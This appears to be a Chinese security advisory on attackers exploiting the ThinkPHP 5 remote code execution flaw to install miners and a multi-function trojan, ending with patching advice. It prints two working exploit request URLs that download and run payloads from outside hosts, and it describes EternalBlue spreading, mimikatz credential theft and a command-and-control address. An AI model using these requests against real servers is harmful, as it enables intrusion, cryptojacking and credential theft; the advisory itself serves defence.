近期ThinkPHP发布了一个安全更新,用于修复未经身份验证的高风险远程代码实行(RCE)漏洞,360Cert也曾针对该漏洞发布过预警(https://cert.360.cn/warning/detail?id=09c85b4e91623c92fc4e21d6cd9b1332)。而最近,我们则监测到利用这个已被表露的ThinkPHP RCE漏洞发起攻击的案例:黑客利用此漏洞在运行有未打补丁的ThinkPHP的做事器上(包含Windows、Linux)安装远控、挖矿、永恒之蓝攻击模块等。
攻击流程示意图
其一,利用ThinkPHP RCE漏洞进行挖矿:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget hxxp://205.185.113.123/ex.sh;curl hxxp://205.185.113.123/ex.sh -O;chmod 777 ex.sh;sh ex.sh
下载挖矿木马的shell脚本
其二,利用ThinkPHP RCE漏洞实行多功能综合木马:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://a46.bulehero.in/download.exe','C:/12.exe');start C:/12.exe
被下载到本地的Download.exe为集远控、挖矿、永恒之蓝攻击等多合一的木马:
个中,挖矿模块参数如下:
挖矿模块参数
从钱包地址查看,已经有146个门罗币的进帐:
钱包地址干系信息
Download.exe中的永恒之蓝攻击模块:
永恒之蓝攻击模块
木马会获取本地IP段,并随机天生部分IP段进行永恒之蓝攻击考试测验:
基于永恒之蓝模块发起的攻击
此外,木马还会调用mimikatz获取windows账号的密码:
调用mimkatz获取windows系统账号
末了,木马还带有远控模块,其上线地址为:a45[.]bulehero[.]in
远控功能模块
远控连接
360互联网安全中央提醒广大站长:
1. 将ThinkPHP升级到5.0.23或5.1.31以上的版本,以办理此问题。
2. 如果您正在利用基于ThinkPHP5的CMS(网站内容管理系统),也可能会受此漏洞影响,同样建议对其进行升级。
3. 做事器及时安装系统漏洞补丁并利用安全软件进行防护。
附:ThinkPHP干系解释的官网链接:https://blog.thinkphp.cn/869075
ThinkPHP5安全更新解释
